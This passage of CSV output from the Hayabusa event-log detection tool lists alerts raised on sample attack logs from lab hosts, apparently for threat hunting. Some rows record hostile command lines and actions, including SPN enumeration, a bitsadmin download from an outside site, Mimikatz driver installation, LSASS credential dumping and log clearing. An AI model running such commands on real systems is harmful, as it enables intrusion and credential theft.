Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.717 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder 
nPowerShell).evtx +2021-01-30 18:13:17.717 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.733 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.733 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: 
SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-04 00:17:16.085 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-04 00:33:16.107 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx +2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and 
Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx +2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-08 22:01:11.198 +09:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:57:19.435 +09:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx +2021-02-23 08:07:20.794 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: 
https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-02-23 08:08:02.534 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-03-03 19:24:12.402 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-03 19:33:48.102 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: 
https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: 
http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-17 00:50:54.591 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 06:56:19.530 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:56:32.794 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:56:50.874 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 
0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:56:53.090 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:57:05.324 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:57:11.415 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto 
start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for 
Mimikatz.evtx +2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.490 
+09:00,jump01.offsec.lan,4697,info,Persis,Service Installed,Name: mimidrv | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | User: admmig | SrvAccount: LocalSystem | SrvType: 0x1 | SrvStartType: 2 | LID: 0xcc3c3,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,../hayabusa-rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,ResDev,Relevant Anti-Virus 
Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups 
Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 05:41:38.966 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx +2021-03-27 05:41:39.009 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 